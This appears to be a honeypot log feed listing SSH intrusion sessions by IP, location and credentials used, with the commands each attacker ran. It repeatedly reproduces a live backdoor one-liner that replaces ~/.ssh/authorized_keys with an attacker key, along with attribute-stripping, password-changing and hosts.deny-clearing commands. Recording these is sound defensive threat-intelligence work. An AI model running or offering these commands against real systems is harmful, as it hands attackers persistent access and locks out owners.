$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "ubuntu\nrqDzgDVvKBTj\nrqDzgDVvKBTj"|passwd|bash

$ Enter new UNIX password:

$ echo "ubuntu\nrqDzgDVvKBTj\nrqDzgDVvKBTj\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 lantern_root_13 (39.105.51.214) — Beijing, China · 1 session · 1 cmd

2026-04-16 08:11 EDT · as pi/pi

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root_53 (152.32.211.151) — Hong Kong, Hong Kong · 2 sessions · 22 cmds

2026-04-16 07:21 EDT · as oracle/Oracle10, user/user

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "user\nrt5BX8fBxjY8\nrt5BX8fBxjY8"|passwd|bash

$ Enter new UNIX password:

$ echo "user\nrt5BX8fBxjY8\nrt5BX8fBxjY8\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 strudel_root_6 (85.184.248.187) — Frankfurt am Main, Germany · 2 sessions · 21 cmds

2026-03-17 07:49 EDT · as oracle/Oracle19, root/admin

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:m1HyR2FsWJu8"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 lantern_root_14 (36.133.214.135) — Guangzhou, China · 1 session · 1 cmd

2026-04-16 07:11 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 rogue_root_22 (185.226.89.235) — Tirana, Albania · 1 session · 2 cmds

2026-04-16 05:07 EDT · as oracle/oracle123456

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cipher_root_46 (196.189.237.175) — Nazrēt, Ethiopia · 1 session · 2 cmds

2026-04-16 04:56 EDT · as oracle/oracle123456

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 autobahn_root_12 (178.104.142.172) — Nuremberg, Germany · 1 session · 1 cmd

2026-04-16 04:56 EDT · as root/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 shadow_sol_6 (189.178.79.210) — Guadalajara, Mexico · 1 session · 20 cmds

2026-04-16 04:43 EDT · as eth/eth

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "eth\nW9xIGJLAdSF0\nW9xIGJLAdSF0"|passwd|bash

$ Enter new UNIX password:

$ echo "eth\nW9xIGJLAdSF0\nW9xIGJLAdSF0\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 specter_root_24 (101.36.111.119) — Hong Kong, Hong Kong · 1 session · 2 cmds

2026-04-16 03:26 EDT · as oracle/Oracle22

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_16 (34.81.72.185) — Taipei, Taiwan · 1 session · 2 cmds

2026-04-16 03:18 EDT · as oracle/Oracle22

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 stein_root_15 (45.144.55.15) — Frankfurt am Main, Germany · 2 sessions · 2 cmds

2026-04-13 06:11 EDT · as root/123456

process enumeration → privilege check

$ ps aux

↳ process enumeration

$ id

↳ privilege check

🎭 bistro_root_3 (194.163.141.68) — Lauterbourg, France · 1 session · 1 cmd

2026-04-16 02:18 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 ghost_root_21 (163.7.4.169) — Banguntapan, Indonesia · 2 sessions · 4 cmds

2026-04-12 02:32 EDT · as oracle/Oracle2026!@#, oracle/oracleoracle

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 cipher_root_47 (165.154.6.146) — Hong Kong, Hong Kong · 2 sessions · 4 cmds

2026-04-15 07:38 EDT · as oracle/Oracle23, oracle/oracle27!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 specter_root_40 (103.239.252.132) — Dhaka, Bangladesh · 1 session · 2 cmds

2026-04-16 00:14 EDT · as oracle/oracle!@#$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 cipher_root_48 (197.199.224.52) — Al Qāhirah al Jadīdah, Egypt · 1 session · 2 cmds

2026-04-16 00:12 EDT · as oracle/Oracle23

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 samba_root (138.204.127.54) — Cabo Frio, Brazil · 1 session · 2 cmds

2026-04-16 00:10 EDT · as oracle/Oracle27

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_root_41 (147.50.103.212) — Phaya Thai, Thailand · 1 session · 2 cmds

2026-04-16 00:07 EDT · as oracle/Oracle23

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 jade_root_7 (14.103.118.73) — Haidian, China · 1 session · 2 cmds

2026-04-16 00:06 EDT · as oracle/oracle!@#$

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 satay_root (47.250.210.123) — Kuala Lumpur, Malaysia · 1 session · 1 cmd

2026-04-16 00:05 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 satay_root_2 (202.165.29.174) — Kuala Lumpur, Malaysia · 1 session · 2 cmds

2026-04-15 23:58 EDT · as oracle/Oracle23

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 dragon_root_15 (60.205.146.239) — Beijing, China · 1 session · 1 cmd

2026-04-15 23:48 EDT · as oracle/oracle1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 wraith_root_35 (154.221.23.230) — Chai Wan, Hong Kong · 1 session · 2 cmds

2026-04-15 23:30 EDT · as oracle/oracle22!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 k-pop_root_3 (121.141.219.98) — Gangseo-gu, South Korea · 1 session · 2 cmds

2026-04-15 23:24 EDT · as oracle/oracle22!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 phantom_root_31 (43.129.38.37) — Jakarta, Indonesia · 1 session · 2 cmds

2026-04-15 23:21 EDT · as oracle/oracle123456

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wraith_root_36 (103.181.143.216) — Cicurug, Indonesia · 1 session · 2 cmds

2026-04-15 22:58 EDT · as oracle/oracle123456

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 silk_root_14 (101.200.148.8) — Beijing, China · 1 session · 1 cmd

2026-04-15 20:00 EDT · as oracle/oracle@123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 eagle_root_11 (66.154.119.88) — St Louis, United States · 1 session · 1 cmd

2026-04-15 17:58 EDT · as admin/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 cipher_root_49 (103.49.62.60) — Kwun Tong, Hong Kong · 1 session · 1 cmd

2026-04-15 17:41 EDT · as pi/pi

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root_54 (91.224.92.177) — Vilnius, Lithuania · 2 sessions · 2 cmds

2026-04-15 13:46 EDT · as admin/password

pwd

$ pwd ×2

🎭 ghost_root_19 (103.76.120.204) — Cicurug, Indonesia · 1 session · 2 cmds

2026-04-15 07:00 EDT · as oracle/M3gaP33!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

